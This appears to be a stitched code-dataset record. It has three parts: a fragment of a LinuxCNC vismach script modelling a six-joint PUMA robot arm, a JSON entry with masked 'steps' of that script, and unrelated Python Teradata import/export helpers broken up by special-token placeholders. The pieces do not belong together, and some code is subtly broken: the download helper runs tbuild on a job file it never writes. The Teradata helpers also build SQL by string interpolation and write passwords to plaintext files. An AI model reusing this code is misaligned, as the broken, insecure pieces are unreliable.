link6 = Translate([link6],0,0,-50)
link6 = Collection([tooltip,link6])
# assembly fingers, and make it rotate
link6 = HalRotate([link6],c,"joint6",1,0,0,1)
# moving part of wrist joint
link5 = Collection([
CylinderZ( 27, 30, 35, 30),
CylinderX(-13, 25, 13, 25),
Box(-11, -25, 0, 11, 25, 27)])
# move gripper to end of wrist and attach D6=95
link5 = Collection([
link5,
Translate([link6],0,0,95)])
# make wrist bend
link5 = HalRotate([link5],c,"joint5",1,1,0,0)
# fixed part of wrist joint (rotates on end of arm)
link4 = Collection([
CylinderX(-13, 22, -27, 22),
CylinderX( 13, 22, 27, 22),
Box(-15, -22, -30, -25, 22, 0),
Box( 15, -22, -30, 25, 22, 0),
Box(-25, -25, -45, 25, 25, -30)])
# attach wrist, move whole assembly forward so joint 4 is at origin
link4 = Translate([link4,link5], 0, 0, 0)
# make joint 4 rotate
link4 = HalRotate([link4],c,"joint4",1,0,0,1)
# next chunk link length is D4=400
link3 = Collection([
CylinderY(-50,35,25,35),
CylinderZ(0.0, 35, 400-45, 25)])
link3 = Translate([link3],0,50,0)
link3 = Collection([
link3,
CylinderX(-50,40,40,40)])
# move link4 forward and sideways (A3=50) and attach
link3 = Collection([
link3,
Translate([link4],0.0, 50, 400)])
# move whole assembly over so joint 3 is at origin (D3=100)
link3 = Translate([link3],100, 0, 0.0)
# rotate to J3 zero position
link3 = Rotate([link3],90,1,0,0)
# make joint 3 rotate
link3 = HalRotate([link3],c,"joint3",1,1,0,0)
# elbow stuff
link2 = CylinderX(-50,50,50,50)
# move elbow to end of upper arm
link2 = Translate([link2],0.0,0.0,400)
# rest of upper arm (A2 = 400)
link2 = Collection([
link2,
CylinderZ(400, 40, 0, 50),
CylinderX(-70,85,70,85)])
# move link 3 into place and attach
link2 = Collection([
link2,
Translate([link3], 0,0.0,400)])
# rotate into zero J2 position
link2 = Rotate([link2],90,1,0,0)
# make joint 2 rotate
link2 = HalRotate([link2],c,"joint2",1,1,0,0)
# shoulder stuff
link1 = Collection([
CylinderX(-70,70,70,70),
Box(-70,-70,0,70,70,-100)])
# move link2 to end and attach
link1 = Collection([
link1,
link2])
# move whole assembly up so joint 1 is at origin
link1 = Translate([link1],0.0, 0.0, 100)
# make joint 1 rotate
link1 = HalRotate([link1],c,"joint1",1,0,0,1)
# stationary base
link0 = Collection([
CylinderZ(750, 75, 800, 75),
CylinderZ(25, 90, 750, 50),
CylinderZ(0, 200, 35, 200)])
# move link1 to top and attach
link0 = Collection([
link0,
Translate([link1],0.0,0.0,800)])
# add a floor
floor = Box(-500,-500,-10,500,500,0.0)
work = Capture()
model = Collection([link0, floor, work])
main(model, tooltip, work, 1500)
|
flexible
|
{
"blob_id": "ae83a0e1ebf1190ab55459563bc7b86d240de89a",
"index": 4146,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nc.newpin('joint1', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint2', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint3', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint4', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint5', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint6', hal.HAL_FLOAT, hal.HAL_IN)\nc.ready()\n<mask token>\nmain(model, tooltip, work, 1500)\n",
"step-3": "<mask token>\nc = hal.component('pumagui')\nc.newpin('joint1', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint2', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint3', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint4', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint5', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint6', hal.HAL_FLOAT, hal.HAL_IN)\nc.ready()\nfinger1 = CylinderZ(0, 5, 50, 5)\ntooltip = Capture()\nlink6 = Collection([finger1, Box(-25, -25, -10, 25, 25, 0)])\nlink6 = Translate([link6], 0, 0, -50)\nlink6 = Collection([tooltip, link6])\nlink6 = HalRotate([link6], c, 'joint6', 1, 0, 0, 1)\nlink5 = Collection([CylinderZ(27, 30, 35, 30), CylinderX(-13, 25, 13, 25),\n Box(-11, -25, 0, 11, 25, 27)])\nlink5 = Collection([link5, Translate([link6], 0, 0, 95)])\nlink5 = HalRotate([link5], c, 'joint5', 1, 1, 0, 0)\nlink4 = Collection([CylinderX(-13, 22, -27, 22), CylinderX(13, 22, 27, 22),\n Box(-15, -22, -30, -25, 22, 0), Box(15, -22, -30, 25, 22, 0), Box(-25, \n -25, -45, 25, 25, -30)])\nlink4 = Translate([link4, link5], 0, 0, 0)\nlink4 = HalRotate([link4], c, 'joint4', 1, 0, 0, 1)\nlink3 = Collection([CylinderY(-50, 35, 25, 35), CylinderZ(0.0, 35, 400 - 45,\n 25)])\nlink3 = Translate([link3], 0, 50, 0)\nlink3 = Collection([link3, CylinderX(-50, 40, 40, 40)])\nlink3 = Collection([link3, Translate([link4], 0.0, 50, 400)])\nlink3 = Translate([link3], 100, 0, 0.0)\nlink3 = Rotate([link3], 90, 1, 0, 0)\nlink3 = HalRotate([link3], c, 'joint3', 1, 1, 0, 0)\nlink2 = CylinderX(-50, 50, 50, 50)\nlink2 = Translate([link2], 0.0, 0.0, 400)\nlink2 = Collection([link2, CylinderZ(400, 40, 0, 50), CylinderX(-70, 85, 70,\n 85)])\nlink2 = Collection([link2, Translate([link3], 0, 0.0, 400)])\nlink2 = Rotate([link2], 90, 1, 0, 0)\nlink2 = HalRotate([link2], c, 'joint2', 1, 1, 0, 0)\nlink1 = Collection([CylinderX(-70, 70, 70, 70), Box(-70, -70, 0, 70, 70, -100)]\n )\nlink1 = Collection([link1, link2])\nlink1 = Translate([link1], 0.0, 0.0, 100)\nlink1 = HalRotate([link1], c, 'joint1', 1, 0, 0, 
1)\nlink0 = Collection([CylinderZ(750, 75, 800, 75), CylinderZ(25, 90, 750, 50),\n CylinderZ(0, 200, 35, 200)])\nlink0 = Collection([link0, Translate([link1], 0.0, 0.0, 800)])\nfloor = Box(-500, -500, -10, 500, 500, 0.0)\nwork = Capture()\nmodel = Collection([link0, floor, work])\nmain(model, tooltip, work, 1500)\n",
"step-4": "from vismach import *\nimport hal\nc = hal.component('pumagui')\nc.newpin('joint1', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint2', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint3', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint4', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint5', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint6', hal.HAL_FLOAT, hal.HAL_IN)\nc.ready()\nfinger1 = CylinderZ(0, 5, 50, 5)\ntooltip = Capture()\nlink6 = Collection([finger1, Box(-25, -25, -10, 25, 25, 0)])\nlink6 = Translate([link6], 0, 0, -50)\nlink6 = Collection([tooltip, link6])\nlink6 = HalRotate([link6], c, 'joint6', 1, 0, 0, 1)\nlink5 = Collection([CylinderZ(27, 30, 35, 30), CylinderX(-13, 25, 13, 25),\n Box(-11, -25, 0, 11, 25, 27)])\nlink5 = Collection([link5, Translate([link6], 0, 0, 95)])\nlink5 = HalRotate([link5], c, 'joint5', 1, 1, 0, 0)\nlink4 = Collection([CylinderX(-13, 22, -27, 22), CylinderX(13, 22, 27, 22),\n Box(-15, -22, -30, -25, 22, 0), Box(15, -22, -30, 25, 22, 0), Box(-25, \n -25, -45, 25, 25, -30)])\nlink4 = Translate([link4, link5], 0, 0, 0)\nlink4 = HalRotate([link4], c, 'joint4', 1, 0, 0, 1)\nlink3 = Collection([CylinderY(-50, 35, 25, 35), CylinderZ(0.0, 35, 400 - 45,\n 25)])\nlink3 = Translate([link3], 0, 50, 0)\nlink3 = Collection([link3, CylinderX(-50, 40, 40, 40)])\nlink3 = Collection([link3, Translate([link4], 0.0, 50, 400)])\nlink3 = Translate([link3], 100, 0, 0.0)\nlink3 = Rotate([link3], 90, 1, 0, 0)\nlink3 = HalRotate([link3], c, 'joint3', 1, 1, 0, 0)\nlink2 = CylinderX(-50, 50, 50, 50)\nlink2 = Translate([link2], 0.0, 0.0, 400)\nlink2 = Collection([link2, CylinderZ(400, 40, 0, 50), CylinderX(-70, 85, 70,\n 85)])\nlink2 = Collection([link2, Translate([link3], 0, 0.0, 400)])\nlink2 = Rotate([link2], 90, 1, 0, 0)\nlink2 = HalRotate([link2], c, 'joint2', 1, 1, 0, 0)\nlink1 = Collection([CylinderX(-70, 70, 70, 70), Box(-70, -70, 0, 70, 70, -100)]\n )\nlink1 = Collection([link1, link2])\nlink1 = Translate([link1], 0.0, 0.0, 100)\nlink1 = HalRotate([link1], c, 
'joint1', 1, 0, 0, 1)\nlink0 = Collection([CylinderZ(750, 75, 800, 75), CylinderZ(25, 90, 750, 50),\n CylinderZ(0, 200, 35, 200)])\nlink0 = Collection([link0, Translate([link1], 0.0, 0.0, 800)])\nfloor = Box(-500, -500, -10, 500, 500, 0.0)\nwork = Capture()\nmodel = Collection([link0, floor, work])\nmain(model, tooltip, work, 1500)\n",
"step-5": "#! /usr/bin/python2\n# Copyright 2007 John Kasunich and Jeff Epler\n# \n# modified by Rudy du Preez to fit with the kinematics component pumakins.c\n# Note: DH parameters in pumakins halfile should bet set to \n# A2=400, A3=50, D3=100, D4=400, D6=95\n#\n# z | \n# | \n# |__________y top of the base.\n# /\n# / A2\n# x /\n# /_______\n# D3 /\n# / A3\n# |\n# |\n# | D4\n# |___\n# |\n# tooltip | D6\n#\n# or they should be changed below to fit. Otherwise you wont get straight lines\n# moving x or y or z in world mode. If all is correct the tool should rotate \n# about its tip with no x,y,z movement for changes in A,B,C at any point in the \n# workspace.\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n\n\nfrom vismach import *\nimport hal\n\nc = hal.component(\"pumagui\")\nc.newpin(\"joint1\", hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin(\"joint2\", hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin(\"joint3\", hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin(\"joint4\", hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin(\"joint5\", hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin(\"joint6\", hal.HAL_FLOAT, hal.HAL_IN)\nc.ready()\n\n###################\n\n# tool or finger \nfinger1 = CylinderZ(0, 5, 50, 5)\n\n# \"tooltip\" for backplot will be the tip of the finger\ntooltip = Capture()\n\n# \"hand\" - the part the finger is attached to\nlink6 = Collection([\n finger1,\n\tBox(-25, -25, -10, 25, 25, 0)])\nlink6 = Translate([link6],0,0,-50)\nlink6 = Collection([tooltip,link6])\n# assembly fingers, and make it rotate\nlink6 = HalRotate([link6],c,\"joint6\",1,0,0,1)\n\n# moving part of wrist joint\nlink5 = Collection([\n\tCylinderZ( 27, 30, 35, 30),\n\tCylinderX(-13, 25, 13, 25),\n\tBox(-11, -25, 0, 11, 25, 27)])\n# move gripper to end of wrist and attach D6=95\nlink5 = Collection([\n\tlink5,\n\tTranslate([link6],0,0,95)])\n# make wrist bend\nlink5 = HalRotate([link5],c,\"joint5\",1,1,0,0)\n\n# fixed part of wrist joint (rotates on end of arm)\nlink4 = Collection([\n\tCylinderX(-13, 22, -27, 22),\n\tCylinderX( 13, 22, 27, 22),\n\tBox(-15, -22, -30, -25, 22, 0),\n\tBox( 15, -22, -30, 25, 22, 0),\n\tBox(-25, -25, -45, 25, 25, -30)])\n# attach wrist, move whole assembly forward so joint 4 is at origin\nlink4 = Translate([link4,link5], 0, 0, 0)\n# make joint 4 rotate\nlink4 = HalRotate([link4],c,\"joint4\",1,0,0,1)\n\n# next chunk link length is D4=400\nlink3 = Collection([\n\tCylinderY(-50,35,25,35),\n\tCylinderZ(0.0, 35, 400-45, 25)])\nlink3 = 
Translate([link3],0,50,0)\nlink3 = Collection([\n link3,\n CylinderX(-50,40,40,40)])\n# move link4 forward and sideways (A3=50) and attach\nlink3 = Collection([\n\tlink3,\n\tTranslate([link4],0.0, 50, 400)])\n# move whole assembly over so joint 3 is at origin (D3=100)\nlink3 = Translate([link3],100, 0, 0.0)\n# rotate to J3 zero position\nlink3 = Rotate([link3],90,1,0,0)\n# make joint 3 rotate\nlink3 = HalRotate([link3],c,\"joint3\",1,1,0,0)\n\n# elbow stuff\nlink2 = CylinderX(-50,50,50,50)\n# move elbow to end of upper arm\nlink2 = Translate([link2],0.0,0.0,400)\n# rest of upper arm (A2 = 400)\nlink2 = Collection([\n\tlink2,\n\tCylinderZ(400, 40, 0, 50),\n\tCylinderX(-70,85,70,85)])\n# move link 3 into place and attach\nlink2 = Collection([\n\tlink2,\n\tTranslate([link3], 0,0.0,400)])\n# rotate into zero J2 position\nlink2 = Rotate([link2],90,1,0,0)\n# make joint 2 rotate\nlink2 = HalRotate([link2],c,\"joint2\",1,1,0,0)\n\n# shoulder stuff\nlink1 = Collection([\n\tCylinderX(-70,70,70,70),\n\tBox(-70,-70,0,70,70,-100)])\n# move link2 to end and attach\nlink1 = Collection([\n\tlink1,\n\tlink2])\n# move whole assembly up so joint 1 is at origin\nlink1 = Translate([link1],0.0, 0.0, 100)\n# make joint 1 rotate\nlink1 = HalRotate([link1],c,\"joint1\",1,0,0,1)\n\n# stationary base\nlink0 = Collection([\n\tCylinderZ(750, 75, 800, 75),\n\tCylinderZ(25, 90, 750, 50),\n\tCylinderZ(0, 200, 35, 200)])\n# move link1 to top and attach\nlink0 = Collection([\n\tlink0,\n\tTranslate([link1],0.0,0.0,800)])\n\n# add a floor\nfloor = Box(-500,-500,-10,500,500,0.0)\nwork = Capture()\n\nmodel = Collection([link0, floor, work])\n\nmain(model, tooltip, work, 1500)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def get_session(db, usr, pwd):
"""Функция устанавливает соединение с ТД и возвращает сессию"""
if platform.system() == 'Windows':
driver = 'Teradata'
else:
driver = 'Teradata Database ODBC Driver 16.20'
udaExec = teradata.UdaExec(appName='DataLoad', version='0.1',
logConsole=False)
session = udaExec.connect(method='odbc', system=db, username=usr,
password=pwd, driver=driver, charset='UTF8', autoCommit='True',
USEREGIONALSETTINGS='N', transactionMode='TERADATA')
return session
def sql2df(query, session, chunksize=100000):
""" Функция грузит из терадаты данные в батчах по 100к и склеивает их в одну таблицу """
db = pd.read_sql(query, session, chunksize=chunksize)
data = pd.DataFrame()
for x in tqdm(db):
data = pd.concat([data, x])
return data
def check_config():
""" .twbcfg.ini to root path """
path = os.path.expanduser('~')
config_path = os.path.join(path, '.twbcfg.ini')
log_path = os.path.join(path, 'tmp', 'teradata_logs')
if not os.path.exists(config_path):
if not os.path.exists(log_path):
os.mkdir(log_path)
config = (
f"CheckpointDirectory='{log_path}' \n LogDirectory='{log_path}' "
)
with open(config_path, 'w') as f:
f.write(config)
<|reserved_special_token_0|>
def py2td(x):
"""Функция вставляет пропуски и корректирует тип данных под ТД"""
x_type = type(x)
if x_type == float:
if x % 1 == 0:
return int(x)
else:
return x
elif x == 'null':
return None
else:
return x
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_session(db, usr, pwd):
"""Функция устанавливает соединение с ТД и возвращает сессию"""
if platform.system() == 'Windows':
driver = 'Teradata'
else:
driver = 'Teradata Database ODBC Driver 16.20'
udaExec = teradata.UdaExec(appName='DataLoad', version='0.1',
logConsole=False)
session = udaExec.connect(method='odbc', system=db, username=usr,
password=pwd, driver=driver, charset='UTF8', autoCommit='True',
USEREGIONALSETTINGS='N', transactionMode='TERADATA')
return session
def sql2df(query, session, chunksize=100000):
""" Функция грузит из терадаты данные в батчах по 100к и склеивает их в одну таблицу """
db = pd.read_sql(query, session, chunksize=chunksize)
data = pd.DataFrame()
for x in tqdm(db):
data = pd.concat([data, x])
return data
def check_config():
""" .twbcfg.ini to root path """
path = os.path.expanduser('~')
config_path = os.path.join(path, '.twbcfg.ini')
log_path = os.path.join(path, 'tmp', 'teradata_logs')
if not os.path.exists(config_path):
if not os.path.exists(log_path):
os.mkdir(log_path)
config = (
f"CheckpointDirectory='{log_path}' \n LogDirectory='{log_path}' "
)
with open(config_path, 'w') as f:
f.write(config)
<|reserved_special_token_0|>
def py2td(x):
"""Функция вставляет пропуски и корректирует тип данных под ТД"""
x_type = type(x)
if x_type == float:
if x % 1 == 0:
return int(x)
else:
return x
elif x == 'null':
return None
else:
return x
def td_import(username='', password='', bd='tdsb15.cgs.sbrf.ru', tbl_name=
'', schema='SBX_RETAIL_MP_PFM', loadframe=True, df=None, path_to_file=
None, fast=False, batch_size=12000, max_sessions=6, buffersize=524288):
"""
Функция записывате данные в ТД через утилиты или ODBC
"""
table = schema + '.' + tbl_name
if not fast:
if not loadframe:
df = pd.read_csv(path_to_file, sep=';', encoding='utf8', index=
False)
n_iters = len(df) // batch_size + (len(df) % batch_size > 0)
df_dict = df.to_dict('records')
session = get_session(bd, username, password)
for i in tqdm(range(n_iters), total=n_iters):
session.executemany(
f"INSERT INTO {table} VALUES ({','.join(list('?' * df.shape[1]))})"
, [list(row.values()) for row in df_dict[i * batch_size:i *
batch_size + batch_size]], batch=True)
session.close()
else:
check_config()
local_seed = str(random.randint(0, 1000000))
path_to_folder = os.path.join(os.getcwd(), 'data', 'output_' +
local_seed)
if os.path.exists(path_to_folder):
shutil.rmtree(path_to_folder)
else:
os.mkdir(path_to_folder)
if loadframe:
converted = df.replace(np.NaN, '').astype(str)
path_to_file = path_to_folder + '/tmp.csv'
converted.to_csv(path_to_file, index=False, header=False, sep=
';', encoding='utf8')
converted_len = converted.apply(lambda x: x.str.encode('utf-8')
.apply(len)).max().to_dict()
else:
converted_len = pd.read_csv(path_to_file, sep=';', dtype='str',
header=None, encoding='utf8', low_memory=False, nrows=100000)
columns_query = f'select * from {table} where 1=0'
session = get_session(bd, username, password)
columns_names = pd.read_sql(columns_query, session).columns.tolist(
)
session.close()
shutil.copy(path_to_file, path_to_folder + '/tmp.csv')
converted_len.columns = columns_names
converted_len = converted_len.apply(lambda x: x.str.encode(
'utf-8').apply(len)).max().to_dict()
td_temp_table = table + '_tmp_' + local_seed
session = get_session(bd, username, password)
session.execute(
f'create multiset table {td_temp_table} as {table} with no data no primary index'
)
session.close()
txt = f"""USING CHARACTER SET UTF8
DEFINE JOB teradata_upload
Description 'Fastload script'
(
DEFINE OPERATOR Load_operator
TYPE LOAD
SCHEMA *
ATTRIBUTES
(
VARCHAR TdPid='{bd}',
VARCHAR UserName='{username}',
VARCHAR UserPassWord='{password}',
VARCHAR TargetTable='{td_temp_table}',
VARCHAR LogTable='{schema}.usr_tpt_log',
VARCHAR DateForm='AnsiDate',
INTEGER MaxSessions={max_sessions}
);
DEFINE SCHEMA Define_Employee_Schema
(
{','.join(f'{key} VARCHAR({max(1, value * 2)})' for key, value in converted_len.items())}
);
DEFINE OPERATOR Producer_File_Detail
TYPE DATACONNECTOR PRODUCER
SCHEMA Define_Employee_Schema
ATTRIBUTES
(
VARCHAR DirectoryPath='{path_to_folder}/'
, VARCHAR FileName='tmp.csv'
, VARCHAR TextDelimiter=';'
, VARCHAR QuotedData = 'Optional'
, VARCHAR OpenQuoteMark = '"'
, VARCHAR CloseQuoteMark = '"'
, VARCHAR Format='Delimited'
, VARCHAR OpenMode='Read'
, VARCHAR INDICATORMODE='N'
, INTEGER BUFFERSIZE = {buffersize}
);
APPLY
(
'INSERT INTO {td_temp_table}({','.join(f'{key}' for key, value in converted_len.items())}) VALUES (:{',:'.join(f'{key}' for key, value in converted_len.items())});'
)
TO OPERATOR(Load_operator)
SELECT * FROM OPERATOR (Producer_File_Detail);
);"""
with open(path_to_folder + '/load_code.tpt', 'w+') as f:
f.write(txt)
p = subprocess.Popen(shlex.split(
f'tbuild -f {path_to_folder}/load_code.tpt -L {path_to_folder}'))
p.wait()
print('Merging in Teradata... \r', end='', flush=True)
session = get_session(bd, username, password)
session.execute(f'insert into {table} sel * from {td_temp_table}')
session.close()
print('Cleaning... \r', end='', flush=True)
session = get_session(bd, username, password)
session.execute(f'drop table {td_temp_table}')
session.close()
shutil.rmtree(path_to_folder)
print('Done!')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_session(db, usr, pwd):
"""Функция устанавливает соединение с ТД и возвращает сессию"""
if platform.system() == 'Windows':
driver = 'Teradata'
else:
driver = 'Teradata Database ODBC Driver 16.20'
udaExec = teradata.UdaExec(appName='DataLoad', version='0.1',
logConsole=False)
session = udaExec.connect(method='odbc', system=db, username=usr,
password=pwd, driver=driver, charset='UTF8', autoCommit='True',
USEREGIONALSETTINGS='N', transactionMode='TERADATA')
return session
def sql2df(query, session, chunksize=100000):
""" Функция грузит из терадаты данные в батчах по 100к и склеивает их в одну таблицу """
db = pd.read_sql(query, session, chunksize=chunksize)
data = pd.DataFrame()
for x in tqdm(db):
data = pd.concat([data, x])
return data
def check_config():
""" .twbcfg.ini to root path """
path = os.path.expanduser('~')
config_path = os.path.join(path, '.twbcfg.ini')
log_path = os.path.join(path, 'tmp', 'teradata_logs')
if not os.path.exists(config_path):
if not os.path.exists(log_path):
os.mkdir(log_path)
config = (
f"CheckpointDirectory='{log_path}' \n LogDirectory='{log_path}' "
)
with open(config_path, 'w') as f:
f.write(config)
def td_download(query='', bd='tdsb15.cgs.sbrf.ru', username='', password='',
fast=False, return_df=False, csv=True, chunksize=100000):
"""
Функция возвращает данные из ТД: путь к csv или датафрейм.
fast=True - использовать утилиты ТД, False - ODBC;
return_df - вернуть датафрейм;
csv - записать данные в файл при fast=False;
chunksize - размер бача для ODBC;
query должен содержать where, чтобы выгрузить название столбцов из БД
"""
local_seed = str(random.randint(0, 1000000))
query = query.replace('\n', ' ')
if not fast:
session = get_session(bd, username, password)
frame = sql2df(query, session, chunksize=chunksize)
session.close()
if return_df:
return frame
else:
path_to_file = os.path.join(os.getcwd(), 'data', 'input_' +
local_seed)
if csv:
filename = path_to_file + '.csv'
frame.to_csv(filename, sep=';', index=False, encoding='utf8')
return filename
else:
dump(frame, path_to_file)
return path_to_file
else:
check_config()
query = query.replace("'", "''")
path_to_folder = os.path.join(os.getcwd(), 'data', 'input_' +
local_seed)
if os.path.exists(path_to_folder):
shutil.rmtree(path_to_folder)
os.mkdir(path_to_folder)
else:
os.mkdir(path_to_folder)
path_to_file = os.path.join(path_to_folder, 'dataset.csv')
open(path_to_file, 'w').close()
txt = (
"""SourceTdpId = '%s'
,SourceUserName = '%s'
,SourceUserPassword = '%s'
,DDLPrivateLogName = 'ddlprivate.log'
,ExportPrivateLogName = 'exportprivate.log'
,TargetErrorList = ['3807']
,TargetFileName = '%s'
,TargetFormat = 'delimited'
,TargetTextDelimiter = ';'
,TargetOpenMode = 'write'
,SelectStmt = '%s' """
% (bd, username, password, path_to_file, query))
qtxt = """USING CHAR SET UTF-8
DEFINE JOB qstart2
(
APPLY TO OPERATOR ($FILE_WRITER)
SELECT * FROM OPERATOR($EXPORT);
);"""
with open(path_to_folder + '/qstart2.txt', 'w+') as f:
f.write(qtxt)
with open(path_to_folder + '/jobvars.txt', 'w+') as f:
f.write(txt)
p = subprocess.run(shlex.split(
f'tbuild -f {path_to_folder}/tdd.txt -v {path_to_folder}/jobvars.txt -j tdd_{str(local_seed)}'
), stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
query = query.replace('\n', ' ').replace("''", "'")
query = query.lower()
query_list = query.split('where')
if len(query_list) == 2:
columns_query = ' where 1=0 and '.join(query_list)
session = get_session(bd, username, password)
columns_names = pd.read_sql(columns_query, session).columns.tolist(
)
session.close()
else:
print("Coudn't load columns names")
columns_names = None
if not return_df:
if columns_names:
with open(path_to_folder + '/columns_names.txt', 'w') as f:
f.write('\n'.join(columns_names))
return path_to_file
else:
if columns_names:
frame = pd.read_csv(path_to_file, names=columns_names,
delimiter=';')
else:
frame = pd.read_csv(path_to_file, header=None, delimiter=';')
return frame
def py2td(x):
"""Функция вставляет пропуски и корректирует тип данных под ТД"""
x_type = type(x)
if x_type == float:
if x % 1 == 0:
return int(x)
else:
return x
elif x == 'null':
return None
else:
return x
def td_import(username='', password='', bd='tdsb15.cgs.sbrf.ru', tbl_name=
    '', schema='SBX_RETAIL_MP_PFM', loadframe=True, df=None, path_to_file=
    None, fast=False, batch_size=12000, max_sessions=6, buffersize=524288):
    """Write data into Teradata either over ODBC or via the TPT utilities.

    Parameters
    ----------
    username, password, bd : Teradata credentials and host.
    tbl_name, schema : target table name and schema.
    loadframe : True to upload the DataFrame ``df``; False to upload the
        ';'-separated utf8 csv file at ``path_to_file``.
    fast : False -> batched ODBC ``executemany`` inserts;
           True  -> stage a csv on disk and bulk-load it with tbuild (TPT)
                    into a temp table, then merge into the target table.
    batch_size : rows per ODBC batch (fast=False).
    max_sessions, buffersize : TPT load tuning knobs (fast=True).
    """
    table = schema + '.' + tbl_name
    if not fast:
        if not loadframe:
            # Bug fix: pandas.read_csv has no `index` keyword -- the
            # original passed index=False, which raised TypeError whenever
            # this branch was taken.
            df = pd.read_csv(path_to_file, sep=';', encoding='utf8')
        # ceil(len(df) / batch_size) without importing math
        n_iters = len(df) // batch_size + (len(df) % batch_size > 0)
        df_dict = df.to_dict('records')
        session = get_session(bd, username, password)
        for i in tqdm(range(n_iters), total=n_iters):
            session.executemany(
                f"INSERT INTO {table} VALUES ({','.join(list('?' * df.shape[1]))})"
                , [list(row.values()) for row in df_dict[i * batch_size:i *
                batch_size + batch_size]], batch=True)
        session.close()
    else:
        check_config()
        # random suffix keeps concurrent uploads from clashing on disk
        local_seed = str(random.randint(0, 1000000))
        path_to_folder = os.path.join(os.getcwd(), 'data', 'output_' +
            local_seed)
        if os.path.exists(path_to_folder):
            shutil.rmtree(path_to_folder)
        # Bug fix: the staging folder must be (re)created in both cases.
        # The original only created it when it did not already exist, so a
        # pre-existing folder was deleted and never restored and the csv
        # write below failed.
        os.mkdir(path_to_folder)
        if loadframe:
            converted = df.replace(np.NaN, '').astype(str)
            path_to_file = path_to_folder + '/tmp.csv'
            converted.to_csv(path_to_file, index=False, header=False, sep=
                ';', encoding='utf8')
            # per-column maximum byte length, used to size the VARCHARs in
            # the TPT schema below
            converted_len = converted.apply(lambda x: x.str.encode('utf-8')
                .apply(len)).max().to_dict()
        else:
            # sample the file to estimate column widths; column names come
            # from an empty (where 1=0) probe of the target table
            converted_len = pd.read_csv(path_to_file, sep=';', dtype='str',
                header=None, encoding='utf8', low_memory=False, nrows=100000)
            columns_query = f'select * from {table} where 1=0'
            session = get_session(bd, username, password)
            columns_names = pd.read_sql(columns_query, session).columns.tolist(
                )
            session.close()
            shutil.copy(path_to_file, path_to_folder + '/tmp.csv')
            converted_len.columns = columns_names
            converted_len = converted_len.apply(lambda x: x.str.encode(
                'utf-8').apply(len)).max().to_dict()
        # stage into a temp table and merge afterwards, so a failed load
        # never leaves the target table half-written
        td_temp_table = table + '_tmp_' + local_seed
        session = get_session(bd, username, password)
        session.execute(
            f'create multiset table {td_temp_table} as {table} with no data no primary index'
            )
        session.close()
        txt = f"""USING CHARACTER SET UTF8
        DEFINE JOB teradata_upload
        Description 'Fastload script'
        (
        DEFINE OPERATOR Load_operator
        TYPE LOAD
        SCHEMA *
        ATTRIBUTES
        (
        VARCHAR TdPid='{bd}',
        VARCHAR UserName='{username}',
        VARCHAR UserPassWord='{password}',
        VARCHAR TargetTable='{td_temp_table}',
        VARCHAR LogTable='{schema}.usr_tpt_log',
        VARCHAR DateForm='AnsiDate',
        INTEGER MaxSessions={max_sessions}
        );
        DEFINE SCHEMA Define_Employee_Schema
        (
        {','.join(f'{key} VARCHAR({max(1, value * 2)})' for key, value in converted_len.items())}
        );
        DEFINE OPERATOR Producer_File_Detail
        TYPE DATACONNECTOR PRODUCER
        SCHEMA Define_Employee_Schema
        ATTRIBUTES
        (
        VARCHAR DirectoryPath='{path_to_folder}/'
        , VARCHAR FileName='tmp.csv'
        , VARCHAR TextDelimiter=';'
        , VARCHAR QuotedData = 'Optional'
        , VARCHAR OpenQuoteMark = '"'
        , VARCHAR CloseQuoteMark = '"'
        , VARCHAR Format='Delimited'
        , VARCHAR OpenMode='Read'
        , VARCHAR INDICATORMODE='N'
        , INTEGER BUFFERSIZE = {buffersize}
        );
        APPLY
        (
        'INSERT INTO {td_temp_table}({','.join(f'{key}' for key, value in converted_len.items())}) VALUES (:{',:'.join(f'{key}' for key, value in converted_len.items())});'
        )
        TO OPERATOR(Load_operator)
        SELECT * FROM OPERATOR (Producer_File_Detail);
        );"""
        with open(path_to_folder + '/load_code.tpt', 'w+') as f:
            f.write(txt)
        p = subprocess.Popen(shlex.split(
            f'tbuild -f {path_to_folder}/load_code.tpt -L {path_to_folder}'))
        p.wait()
        print('Merging in Teradata...              \r', end='', flush=True)
        session = get_session(bd, username, password)
        session.execute(f'insert into {table} sel * from {td_temp_table}')
        session.close()
        print('Cleaning...                         \r', end='', flush=True)
        session = get_session(bd, username, password)
        session.execute(f'drop table {td_temp_table}')
        session.close()
        shutil.rmtree(path_to_folder)
        print('Done!')
<|reserved_special_token_1|>
import os
import numpy as np
import pandas as pd
import random
import platform
import subprocess
import shlex
import teradata
from joblib import dump
import shutil
from tqdm import tqdm
